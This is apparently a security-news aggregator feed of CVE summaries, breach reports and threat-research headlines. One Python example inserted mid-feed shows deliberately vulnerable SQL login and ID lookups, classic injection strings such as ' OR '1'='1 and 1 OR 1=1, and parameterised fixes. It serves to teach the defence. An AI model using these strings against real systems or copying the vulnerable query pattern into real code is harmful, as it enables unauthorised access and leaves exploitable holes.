CVE-2026-2179 | PHPGurukul Hospital Management System 4.0 /admin/manage-users.php ID sql injection (EUVD-2026-5771)
A vulnerability was found in PHPGurukul Hospital Management System 4.0. It has been classified as critical. This impacts an unknown function of the file /admin/manage-users.php. This manipulation of the argument ID causes sql injection. This vulnerability is handled as CVE-2026-2179. The atta...
Read Full Article →
CVE-2026-2178 | r-huijts xcode-mcp-server up to f3419f00117aa9949e326f78cc940166c88f18cb run_lldb src/tools/xcode/index.ts registerXcodeTools args command injection (Issue 13 / EUVD-2026-5772)
A vulnerability was found in r-huijts xcode-mcp-server up to f3419f00117aa9949e326f78cc940166c88f18cb and classified as critical. This affects the function registerXcodeTools of the file src/tools/xcode/index.ts of the component run_lldb. The manipulation of the argument args results in command...
Read Full Article →
CVE-2026-2177 | SourceCodester Prison Management System 1.0 Login session fixation (EUVD-2026-5773)
A vulnerability has been found in SourceCodester Prison Management System 1.0 and classified as critical. The impacted element is an unknown function of the component Login. The manipulation leads to session fixation. This vulnerability is traded as CVE-2026-2177. It is possible to initiate t...
Read Full Article →
CVE-2025-15100 | JAY Login & Register Plugin up to 2.6.03 on WordPress jay_panel_ajax_update_profile privileges management
A vulnerability, which was classified as critical, was found in JAY Login & Register Plugin up to 2.6.03 on WordPress. The affected element is the function jay_panel_ajax_update_profile. Executing a manipulation can lead to improper privilege management. This vulnerability appears as CVE-2025-1...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2176 | code-projects Contact Management System 1.0 index.py selecteditem[0] sql injection (EUVD-2026-5774)
A vulnerability classified as critical was found in code-projects Contact Management System 1.0. This issue affects some unknown processing of the file index.py. Such manipulation of the argument selecteditem[0] leads to sql injection. This vulnerability is documented as CVE-2026-2176. The att...
Read Full Article →
CVE-2026-2175 | D-Link DIR-823X 250416 /goform/set_upnp sub_420618 upnp_enable os command injection (EUVD-2026-5775)
A vulnerability classified as critical has been found in D-Link DIR-823X 250416. This vulnerability affects the function sub_420618 of the file /goform/set_upnp. This manipulation of the argument upnp_enable causes os command injection. This vulnerability is registered as CVE-2026-2175. Remote...
Read Full Article →
CVE-2026-2174 | code-projects Contact Management System 1.0 CRUD Endpoint ID improper authentication (EUVD-2026-5776)
A vulnerability described as critical has been identified in code-projects Contact Management System 1.0. This affects an unknown part of the component CRUD Endpoint. The manipulation of the argument ID results in improper authentication. This vulnerability is cataloged as CVE-2026-2174. The a...
Read Full Article →
CVE-2026-2173 | code-projects Online Examination System 1.0 login.php username/password sql injection (EUVD-2026-5777)
A vulnerability marked as critical has been reported in code-projects Online Examination System 1.0. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument username/password leads to sql injection. This vulnerability is listed as CVE-2026-21...
Read Full Article → *(Covered by: VulnDB)*
CVE-2026-2172 | code-projects Online Application System for Admission 1.0 Login Endpoint enrollment/index.php sql injection (EUVD-2026-5778)
A vulnerability labeled as critical has been found in code-projects Online Application System for Admission 1.0. Affected by this vulnerability is an unknown functionality of the file enrollment/index.php of the component Login Endpoint. Executing a manipulation can lead to sql injection. This ...
Read Full Article →
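Most of the SQL injection entries above (login forms taking `username`/`password` or `email`, and admin pages taking a numeric `ID`) share one root cause: the request parameter is concatenated into the query text. The added example below, written for this roundup and not taken from any of the listed projects, rebuilds both shapes against an in-memory SQLite table with constructed rows, runs the classic bypass inputs against the concatenated query, and shows the parameterised form that treats the same inputs as plain data. Table and column names are assumed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; plaintext passwords only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "S3cret!", "admin"), ("alice", "hunter2", "user")],
    )
    return conn


# --- the vulnerable shapes --------------------------------------------------

def login_vulnerable(conn, username: str, password: str):
    """String-built query: a quote in the input ends the literal and the rest
    of the input becomes SQL.  `admin'--` comments out the password check;
    `' OR '1'='1` in the password makes the predicate true for every row."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username='{username}' AND password='{password}' ORDER BY id")
    return conn.execute(sql).fetchone()


def get_user_vulnerable(conn, user_id: str):
    """Numeric context: no quotes are needed, `1 OR 1=1` dumps every row."""
    return conn.execute(f"SELECT id, username FROM users WHERE id={user_id}").fetchall()


# --- the fixed shapes -------------------------------------------------------

def login_safe(conn, username: str, password: str):
    """Placeholders: the driver binds values separately, so they are never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username=? AND password=? ORDER BY id"
    return conn.execute(sql, (username, password)).fetchone()


def get_user_safe(conn, user_id: str):
    """Coerce to the expected type first; int() rejects `1 OR 1=1` outright."""
    return conn.execute("SELECT id, username FROM users WHERE id=?", (int(user_id),)).fetchall()
```

Parameterisation is the fix; escaping or stripping quotes is not, because the numeric case shows injection needs no quote at all.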
Hong Kong plans to revive privacy law requiring firms to report data breaches
Harvey Kong reports: Hong Kong’s privacy watchdog plans to consult lawmakers this year about introducing mandatory data breach reporting and related penalties, the body’s chief has said. Privacy Commissioner for Personal Data Ada Chung Lai-ling on Saturday revealed details about the proposed legi...
Read Full Article →
CVE-2026-2169 | D-Link DWR-M921 1.1.50 formLtefotaUpgradeFibocom fota_url command injection (EUVD-2026-5780)
A vulnerability categorized as critical has been discovered in D-Link DWR-M921 1.1.50. This impacts an unknown function of the file /boafrm/formLtefotaUpgradeFibocom. Such manipulation of the argument fota_url leads to command injection. This vulnerability is referenced as CVE-2026-2169. It is...
Read Full Article → *(Covered by: VulnDB)*
Substack - 663,121 breached accounts
In October 2025, the publishing platform Substack suffered a data breach that was subsequently circulated more widely in February 2026. The breach exposed 663k account holder records containing email addresses along with publicly visible profile information from Substack accounts, such as publica...
Read Full Article →
Nitrogen’s ransomware can’t be decrypted — even by Nitrogen
Government advisories have informed entities and the public that paying ransomware gangs to get a decryptor key is no guarantee that you will get the decryptor key, or even if you get one, that none of the files will have been corrupted. Here’s a more striking reason not to consider paying for a ...
Read Full Article →
Apple Pay phish uses fake support calls to steal payment details
This Apple Pay phishing campaign is designed to funnel victims into fake Apple Support calls, where scammers steal payment details.
Read Full Article →
Higinio Ochoa, Hacktivist Turned White Hat, On The Cybercrime Magazine Podcast
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Feb. 6, 2026 – Listen to the podcast. On Jun. 25, 2012, 31-year-old Higinio O. Ochoa, III of Dallas, Texas, the self-proclaimed associate of computer hacker groups known as “Anonymous” and “CabinCr3w” pleaded gui...
Read Full Article →
SASE vs SSE: Which Is Best Suited for Your Organization
SASE vs. SSE explained: Understand the key differences between Secure Access Service Edge (SASE) and Security Service Edge (SSE), including when each model makes the most sense for modern, cloud-first organizations. How SSE can be your path to SASE: Learn why many enterprises start with SSE as a...
Read Full Article →
Incognito Market admin sentenced to 30 years for running $105 million dark web drug empire
He promised "the best security there is" to hundreds of thousands of drug buyers, while quietly making the kind of mistake that guaranteed a 30-year sentence. And maybe training police on cryptocurrency while running a vast Tor-hidden drug bazaar wasn't such a good idea. Read more in my...
Read Full Article → *(Covered by: Bitdefender Hot For Security, Graham Cluley)*
OIG audit of hospital’s cybersecurity finds vulnerabilities in common web applications
Chad van Alstin reports: The U.S. Department of Health and Human Services Office of the Inspector General (OIG) released a report focused on a “large Southeastern hospital” that the agency said had security vulnerabilities that could be vectors for a cyberattack. The unnamed hospital, according t...
Read Full Article →
All gas, no brakes: Time to come to AI church
This week, Joe cautions against the rush to adopt AI tools rife with truly awful security vulnerabilities.
Read Full Article →
Nitrogen ransomware ESXi bug makes decryption impossible even after payment
Nitrogen ransomware’s ESXi encryptor corrupts its own public key, making file recovery impossible even if victims pay.
Read Full Article →
Chrysalis, Notepad++, and Supply Chain Risk: What it Means, and What to Do Next
When Rapid7 published its analysis of the Chrysalis backdoor linked to a compromise of Notepad++ update infrastructure, it raised understandable questions from customers and security teams. The investigation showed that attackers did not exploit a flaw in the application itself. Instead, they com...
Read Full Article →
2025 SLG cyber trends: 5 lessons to build a 2026 cyber roadmap
▼
From school districts to state agencies, 2025 cyber incidents were a wake-up call about asset visibility. Discover five actionable lessons SLG leaders can use to close the cyber exposure gap and move from reactive threat detection and response to proactive exposure management. Key takeaways Effec...
Read Full Article →
Open the wrong “PDF” and attackers gain remote access to your PC
▼
The DEAD#VAX campaign tricks users into installing AsyncRAT by disguising a virtual hard disk as a PDF attachment.
Read Full Article →
CISO FAQ: Should I Stay Or Should I Go?
▼
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 5, 2026 –Read the full story in CSO Lack of access to executives and the board is a red flag and a top reason why chief information security officers decide to leave The post CISO FAQ: Should I Stay Or Sho...
Read Full Article →- How Threat Intelligence Helps Protect Financial Organizations from Business Risk — The financial sector resembles a treasure vault under constant siege. Banks, insurers, and fintech firms are not just custodians of money. They are guardians of irreplaceable personal and corporate data, payment flows, transactional integrity, and trust itself. When cybercriminals strike, the rip…
Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework
Cisco Talos uncovered “DKnife,” a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants.
Read Full Article →
Broken Phishing URLs, (Thu, Feb 5th)
For a few days, many phishing emails that landed in my mailbox have contained strange URLs. They are classic emails asking you to open a document, verify your pending emails, …
Read Full Article →
Betterment - 1,435,174 breached accounts
In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-cont...
Read Full Article →
TruConfirm: Autonomous, Agent-Led, Safe Exploit Validation for Real-World Risk Reduction
Key Takeaways The Question CISOs Cannot Answer Today The scan is done. Dashboards are full. Change windows are tight. And one critical question dominates every vulnerability review: “Is this exposure actually exploitable on our asset, in our production environment, with our controls, right now?” V...
Read Full Article →
Ransomware Damage To Cost The World $74B In 2026
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 4, 2026 – Read the full story. Cybersecurity Ventures publishes a chart at RansomwareCost.com containing our calculations of global ransomware damage cost predictions from 2015 to 2031. For this year, 2026, ...
Read Full Article →
Firefox is giving users the AI off switch
Mozilla and other companies are starting to see why giving users a choice over AI features matters.
Read Full Article →
LookOut: Discovering RCE and Internal Access on Looker (Google Cloud & On-Prem)
Tenable Research discovered two novel vulnerabilities in Google Looker that could allow an attacker to completely compromise a Looker instance. Google moved swiftly to patch these issues. Organizations running Looker on-prem should verify they have upgraded to the patched versions. Key takeaways ...
Read Full Article →
- Release Notes: Workflow Improvements, MISP Integration & 2,000+ New Detections — First month of the year, and we’re starting it off with updates that support faster decisions and more predictable SOC operations. In January, we introduced a major workflow enhancement with the new ANY.RUN Sandbox integration with MISP, alongside expanded detection coverage across behavior signa…
[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*
Rublevka Team: Anatomy of a Russian Crypto Drainer Operation
Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.
Read Full Article →
From Clawdbot to Moltbot to OpenClaw: Security Experts Detail Critical Vulnerabilities and 6 Immediate Hardening Steps for the Viral AI Agent
Moltbot, the viral AI agent, offers immense power but is riddled with critical vulnerabilities, including remote code execution (RCE), exposed control interfaces, and malicious extensions. Read on to understand the vulnerabilities associated with Moltbot and the immediate security practices users...
Read Full Article →
SpiderLabs Ransomware Tracker Update January 2025: Qilin Continues as Dominant Threat Group
The January 2026 edition of LevelBlue SpiderLabs ransomware tracker noted a sharp fall in the number of attacks launched compared to December 2025. Qilin remained the top attacker, but there was a reshuffling of the remaining top five attackers for the month.
Read Full Article →
Frequently Asked Questions About Notepad++ Supply Chain Compromise
Threat actors compromised the update infrastructure for Notepad++, redirecting traffic to an attacker controlled site for targeted espionage purposes. Change log Update February 4: This FAQ blog has been updated to note that CVE-2025-15556 was assigned for this security incident. Click here to re...
Read Full Article →
What is Autonomous Penetration Testing and How Does it Work?
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 3, 2026 – Read the full story from BreachLock. Everything you always wanted to know about penetration testing but were afraid to ask can be found in a widely popular blog post from BreachLock, a The post Wha...
Read Full Article →
AT&T breach data resurfaces with new risks for customers
As leaked datasets are merged and enriched, they become more useful to criminals. That makes recycled breach data a bigger risk for customers.
Read Full Article →
[updated] A fake cloud storage alert that ends at Freecash
We followed a fake cloud storage payment alert through deceptive affiliate redirects, ending at a familiar destination: Freecash.
Read Full Article →
- Enterprise Phishing: How Attackers Abuse Trusted Microsoft & Google Platforms — ANY.RUN observes a growing trend of phishing kit infrastructure being hosted on legitimate cloud and CDN platforms, rather than on newly registered domains. These campaigns often target enterprise users specifically, creating a global threat to businesses. The shift creates serious visibility cha…
Mutagen Astronomy: From Discovery to CISA Recognition—A Seven-Year Journey
Introduction On January 26, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2018-14634 to its Known Exploited Vulnerabilities (KEV) catalog. The same vulnerability was discovered by the Qualys Threat Research Unit (TRU) in September 2018. We nicknamed it “Mutagen Astro...
Read Full Article →
How Manifest v3 forced us to rethink Browser Guard, and why that’s a good thing
Browser Guard still blocks scams and phishing like it always has. But we had to rebuild the way it does that from the ground up.
Read Full Article →
LevelBlue Security Colony: A Practical Cybersecurity Resource Hub for CISOs
Empower CISOs with actionable cybersecurity resources including maturity assessments, incident response playbooks, and vendor risk tools. Strengthen security programs using Security Colony, a self-service cybersecurity knowledge platform built by LevelBlue and SpiderLabs experts. Improve cyber r...
Read Full Article →
The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central Am...
Read Full Article →
What’s New in Tenable Cloud Security: Multi-cloud Risk Analysis, Attack Surface Assessments, Improved IAM Security and More
Tenable Cloud Security continues to expand the technical depth of our Tenable One exposure management platform. Our latest enhancements include unified multi-cloud exploration, high-fidelity network validation, and expanded entitlement visibility across infrastructure and identity providers. Key ...
Read Full Article →
U.S. Secret Service Agents Recovered Nearly $1M For A 71-Year-Old Retiree
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 2, 2026 – Read the full story in Moneywise. Cybercrime will cost the world more than $12 trillion annually by 2031, according to Cybersecurity Ventures, and most of that money will never The post U.S. Secret...
Read Full Article →
Scam-checking just got easier: Malwarebytes is now in ChatGPT
Malwarebytes' ChatGPT integration makes it the first cybersecurity provider that can deliver its expertise without ever leaving the chat.
Read Full Article →
A week in security (January 26 – February 1)
A list of topics we covered in the week of January 26 to February 1 of 2026.
Read Full Article →
[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*
[hardware] D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*
Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future
This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent t...
Read Full Article →
FBI takes notorious RAMP ransomware forum offline
The FBI has seized control of RAMP, a notorious cybercrime online forum that bragged that it was the only place that allowed ransomware, and boasted over 14,000 active users. Now some of those users' details are likely to be in the hands of the police... Read more in my article on the Bitdefender blog.
Read Full Article →
Panera Bread - 5,112,502 breached accounts
In January 2026, Panera Bread suffered a data breach that exposed 14M records. After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses....
Read Full Article →
CVE-2026-1281, CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Zero-Day Vulnerabilities Exploited
Two critical vulnerabilities in Ivanti’s popular mobile device management solution have been exploited in the wild in limited attacks. Key takeaways: Patch Ivanti EPMM immediately. Both CVE-2026-1281 and CVE-2026-1340 have been exploited in the wild, though impact has been limited so far. Apply th...
Read Full Article →
Google Presentations Abused for Phishing, (Fri, Jan 30th)
Charlie, one of our readers, has forwarded an interesting phishing email. The email was sent to users of the Vivaldi Webmail service. While not overly convincing, the email is likely sufficient to trick a non-empty group of users:
Read Full Article →
ROC vs. CTEM: How a Risk Operations Center Evolves Beyond Continuous Threat Exposure Management in 2026
Key Takeaways: The Essentials of ROC vs. CTEM Modern enterprises face a constant flood of data from dozens of siloed security tools, creating a fragmented view of risk. Continuous threat exposure management (CTEM) offers a framework to bring exposures together from these tools, and a risk operati...
Read Full Article →
Cybersecurity Predictions for 2026
Six Predictions for the AI-Driven SOC – Subo Guha, Senior Vice President, Product Management, Stellar Cyber San Jose, Calif. – Jan. 30, 2026 Agentic AI as applied to the cybersecurity market is expected to grow from $738.2 million in 2024 to an estimated $1.73 billion The post Cybersecurity Predi...
Read Full Article →
Match, Hinge, OkCupid, and Panera Bread breached by ransomware group
ShinyHunters claims to have stolen millions of records from Match Group dating apps and Panera Bread, with very different consequences for users.
Read Full Article →
Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft
Introduction Mandiant has identified an expansion in threat activity that uses tactics, techniques, and procedures (TTPs) consistent with prior ShinyHunters-branded extortion operations. These operations primarily leverage sophisticated voice phishing (vishing) and victim-branded credential harve...
Read Full Article →
Guidance from the Frontlines: Proactive Defense Against ShinyHunters-Branded Data Theft Targeting SaaS
Introduction Mandiant is tracking a significant expansion and escalation in the operations of threat clusters associated with ShinyHunters-branded extortion. As detailed in our companion report, 'Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft', these campaigns...
Read Full Article →
Orca Security Co-Founder & CEO Gil Geron: Cloud Security Pioneer
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 30, 2026 – Watch the YouTube video. 2026 is here, and the cloud security landscape is shifting rapidly. AI is reshaping how attackers operate, supply chains remain under siege, and the definition of The post...
Read Full Article →
Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529
In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. W...
Read Full Article →
Meta confirms it’s working on premium subscription for its apps
Details are currently thin, but one thing is clear: paying more is unlikely to buy users meaningful privacy or less tracking.
Read Full Article →
I'm locked in!
Hazel reflects on how to find balance while staying informed, then delivers practical updates and insights on the latest cybersecurity threats.
Read Full Article →
Top 10 Cloud Compliance Tools for Enterprise Security and Audit Readiness in 2026
Key Takeaways Compliance Breaks When Proof Lags Infrastructure Cloud compliance has changed. It is no longer an audit milestone. It is a continuous expectation. Boards demand visibility into regulatory exposure. Regulators expect evidence, not intent. Enterprise customers want assurance in real t...
Read Full Article →
Microsoft Office zero-day lets malicious documents slip past security checks
Microsoft issued an emergency patch for a flaw attackers are using to slip malicious code past Office’s document security checks.
Read Full Article →
Microsoft releases update to address zero-day vulnerability in Microsoft Office
Microsoft has published three out-of-band (OOB) updates so far in January 2026. One of these updates was released to address a vulnerability, CVE-2026-21509, affecting Microsoft Office that has been reportedly exploited in the wild.
Read Full Article →
Clawdbot’s rename to Moltbot sparks impersonation campaign
This Moltbot impersonation campaign is a case study in supply-chain risk, brand hijacking, and what happens when open source goes viral.
Read Full Article →
The Mob Museum, Las Vegas: Explore the Past, Present and Future of Cybercrime
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 29, 2026 – Watch the YouTube video. The Mob Museum’s timely new exhibit “Digital Underworld” explores the rise of cybercrime as the newest frontier of organized crime, and it’s captured in a new The post The...
Read Full Article →
Dissecting UAT-8099: New persistence mechanisms and regional focus
Cisco Talos has identified a new, regionally targeted campaign by UAT-8099 that leverages advanced persistence techniques and custom BadIIS malware variants to compromise IIS servers, particularly in Thailand and Vietnam.
Read Full Article →
IR Trends Q4 2025: Exploitation remains dominant, phishing campaign targets Native American tribal organizations
A drop in exploitation and ransomware, but a spike in phishing and credential abuse, show why timely patching and robust MFA matter more than ever.
Read Full Article →
- SOC & Business Success with ANY.RUN: Real-World Results & Cases — Running a SOC today means constant trade-offs: too many alerts, not enough people, strict SLAs, and attacks that keep getting smarter. Most leaders aren’t asking for “the next cool product” but a proof that something actually cuts time, risk, and workload in real environments like theirs. Thousan…
Smashing Security podcast #452: The dark web’s worst assassins, and Pegasus in the dock
In episode 452, a London-based YouTuber wins a landmark court case against Saudi Arabia after his phone was hacked with Pegasus spyware — exposing how a single, seemingly harmless text message can turn a smartphone into a round-the-clock surveillance device. Plus, we go looking for professional h...
Read Full Article →
No Place Like Home Network: Disrupting the World's Largest Residential Proxy Network
Introduction This week Google and partners took action to disrupt what we believe is one of the largest residential proxy networks in the world, the IPIDEA proxy network. IPIDEA’s proxy infrastructure is a little-known component of the digital ecosystem leveraged by a wide array of bad actors. Th...
Read Full Article →
- Attackers Are Taking Over Real Email Threads to Deliver Phishing: New Enterprise Risk — Think you can trust every email that comes from a business partner? Unfortunately, that’s no longer guaranteed; attackers now slip into legitimate threads and send messages that look fully authentic. That’s exactly what happened in a new case uncovered by ANY.RUN researchers; a trust takeover ins…
RSAC 2026—Where The World Talks Security
What founders and CEOs are saying about this year’s conference Register – Steve Morgan, Editor-in-Chief Sausalito, Calif. – Jan. 27, 2026 For 35 years, RSAC has been a driving force behind the world’s cybersecurity community. The power of community is a key focus for the The post RSAC 2026—Where ...
Read Full Article →
Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088
Introduction The Google Threat Intelligence Group (GTIG) has identified widespread, active exploitation of the critical vulnerability CVE-2025-8088 in WinRAR, a popular file archiver tool for Windows, to establish initial access and deliver diverse payloads. Discovered and patched in July 2025, g...
Read Full Article →
Introducing Tenable One AI Exposure: A New Standard for Securing AI Usage at Scale
Continuously discover and monitor all AI usage across your organization, including shadow AI, agents, browser plug-ins, and more, with Tenable One AI Exposure. Map complex AI workflows to reveal high-impact exposures and monitor compliance with security and AI acceptable use policies. Key takeawa...
Read Full Article →
Talking Points for Government CISOs and Cybersecurity Leaders in 2026
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jan. 27, 2026 – Read the full story in Government Technology. Dan Lohrmann is calling all government CISOs (and yes, CTOs, CIOs, CFOs, COOs, and even a few corporate CEOs can listen in): In The post Talking Point...
Read Full Article →
- Fix Staff Shortage & Burnout in Your SOC with Better Threat Intelligence — In cybersecurity, humans occupy both ends of the vulnerability spectrum. They click what should never be clicked, reuse passwords like heirlooms, and generously donate credentials to phishing pages that look “kind of legit.” Yet the same species becomes the strongest link once you step inside a S…
Bypassing Windows Administrator Protection
A headline feature introduced in the latest release of Windows 11, 25H2, is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and, importantly, securable system to allow a local user to access administrator privileges only when necessary....
Read Full Article →
I scan, you scan, we all scan for... knowledge?
In this week's newsletter, Bill hammers home the old adage, "Know your environment" — even throughout alert fatigue.
Read Full Article →
How Public Container Registries Have Become a Silent Risk Multiplier in a Modern Supply Chain
Key Takeaways The Risk Introduced by Implicit Trust in Public Container Images Public container registries have become foundational to modern software development. A single docker pull can accelerate application delivery, standardize environments, and reduce operational friction across teams. How...
Read Full Article →
Foxit, Epic Games Store, MedDreams vulnerabilities
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS.
Read Full Article →
- ANY.RUN Sandbox & MISP Integration: Confirm Alerts Faster, Stop Incidents Early — Most SOC teams are overloaded with routine work. Tier 1 & 2 analysts spend too much time validating alerts, moving samples between tools, and chasing missing context. When integrations are weak, investigations slow down, MTTR grows, and SLAs suffer delays. That directly increases operational risk…
Qualys Named a Leader and Outperformer in the 2025 GigaOm Radar for CNAPP
We’re proud to share that Qualys has been recognized as a Leader and Outperformer in the 2025 GigaOm Radar Report for Cloud-Native Application Protection Platforms (CNAPP). This year’s evaluation underscores an important reality of the CNAPP market: while 18 vendors were evaluated, only a small s...
Read Full Article →
Under Armour - 72,742,892 breached accounts
In November 2025, the Everest ransomware group claimed Under Armour as a victim and attempted to extort a ransom, alleging they had obtained access to 343GB of data. In January 2026, customer data from the incident was published publicly on a popular hacking forum, including 72M email addresses...
Read Full Article →
Oracle January 2026 Critical Patch Update Addresses 158 CVEs
Oracle addresses 158 CVEs in its first quarterly update of 2026 with 337 patches, including 27 critical updates. Key takeaways: The first Critical Patch Update (CPU) for 2026 contains fixes for 158 unique CVEs in 337 security updates. 27 issues (8% of all patches) were assigned a critical severi...
Read Full Article →
Tenable Discovers SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk
Tenable Research has discovered a server-side request forgery (SSRF) vulnerability in Java’s handling of client certificates during a TLS handshake. In certain configurations, this can be abused to cause a denial-of-service (DoS) condition. Key takeaways Tenable Research identified a vulnerabilit...
Read Full Article →
VU#481830: Libheif uncompressed codec lacks bounds check leading to application crash
Overview An out-of-bounds memory access vulnerability exists in the uncompressed decoder component of libheif. A maliciously crafted HEIF image can trigger a denial-of-service condition by causing the libheif library to crash or exhibit other unexpected behavior due to an out-of-bounds memory ac...
Read Full Article →
VU#102648: Code injection vulnerability in binary-parser library
Overview The binary-parser library for Node.js contains a code injection vulnerability that may allow arbitrary JavaScript code execution if untrusted input is used to construct parser definitions. Versions prior to 2.3.0 are affected. The issue has been resolved by the developer in a public upda...
Read Full Article →
VU#458022: Open5GS WebUI uses hard-coded secrets including JSON Web Token signing key
Overview The Open5GS WebUI component contains default hardcoded secrets used for security-sensitive operations, including JSON Web Token (JWT) signing. If these defaults are not changed, an attacker can forge valid authentication tokens and gain administrative access to the WebUI. This can result...
Read Full Article →
VU#271649: Stack-based buffer overflow in libtasn1 versions v4.20.0 and earlier
Overview A stack-based buffer overflow vulnerability exists in GNU libtasn1, a low-level ASN.1 parsing library. The issue is caused by unsafe string concatenation in the asn1_expand_octet_string function located in decoding.c. Under worst-case conditions, this results in a one-byte stack overflo...
Read Full Article →
Cybersecurity Predictions for 2026 Signal the Maturation of Risk-First Security Models
Key Takeaways The Signals Are Loud, the Dashboards Are Full, Yet Decisive Action Remains Elusive By the end of 2025, many security leaders reached a quiet conclusion. The challenge was no longer a lack of tools, telemetry, or frameworks. Most enterprises already had all three. What remained unres...
Read Full Article →
VU#818729: Safetica contains a kernel driver vulnerability
Overview Kernel driver ProcessMonitorDriver.sys in Safetica's endpoint client x64, versions 10.5.75.0 and 11.11.4.0, allows an unprivileged user to abuse an IOCTL path and terminate protected system processes. Description Safetica is a Data Loss Prevention (DLP) and Insider Risk Management (I...
Read Full Article →
VU#244846: Server-Side Template Injection (SSTI) vulnerability exists in Genshi
Overview A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. Genshi processes template expressions using Python’s ‘eval()’ and ‘exec()’ functions while allowing fallback access to Python built-in objects. If ...
Read Full Article →
VU#924114: dr_flac contains an integer overflow vulnerability that allows for DoS when provided a crafted file
Overview dr_flac, an open-source FLAC audio decoder, part of the dr_libs audio decoder toolset, contains an integer overflow vulnerability allowing for denial of service (DoS) when provided a specific crafted file. An attacker can exploit this vulnerability through providing a tool that uses dr_...
Read Full Article →
- Malware Trends Report 2025: New Security Risks for Businesses in 2026 — Summarizing the past year’s threat landscape based on activity observed in ANY.RUN’s Interactive Sandbox, this annual report provides insights into the most detected malware types, families, TTPs, and phishing threats of 2025. For additional insights, view ANY.RUN’s quarterly malware trends repor…
VU#383552: thelibrarian does not secure its interface, allowing for access to internal system data
Overview Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Dr...
Read Full Article →
VU#650657: Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products
Overview A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows users to upload various files, including PHP files, and host them within the Laravel application. W...
Read Full Article →
Threat and Vulnerability Management in 2026
Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.
Read Full Article →
Predicting 2026
In this week’s newsletter, Martin examines the evolving landscape for 2026, highlighting key threats, emerging trends like AI-driven risks, and the continued importance of addressing familiar vulnerabilities.
Read Full Article →
Your VMDR Year in Review: Making Security Progress Visible and Actionable
Security Teams Rarely Stop to Reflect When a security program is working well, very little seems to happen. That is by design. There is no alert for the incident that was prevented. No visibility into the attack path that was quietly closed. No recognition for the vulnerability that was fixed bef...
Read Full Article →
WEF: AI overtakes ransomware as fastest-growing cyber risk
We can no longer say that artificial intelligence is a "future risk", lurking somewhere on a speculative threat horizon. The truth is that it is a fast-growing cybersecurity risk that organizations are facing today. That's not just my opinion, that's also the message that comes loud and clear fro...
Read Full Article →
Why Serverless Risk Demands Identity-Aware Security at Cloud Scale
Key Takeaways The Current Picture Serverless adoption is accelerating as organizations prioritize speed, scalability, and operational efficiency. According to the Data Bridge Market Research’s Global Serverless Security Market Report, the serverless security market reached USD 12.08 billion in 20...
Read Full Article →
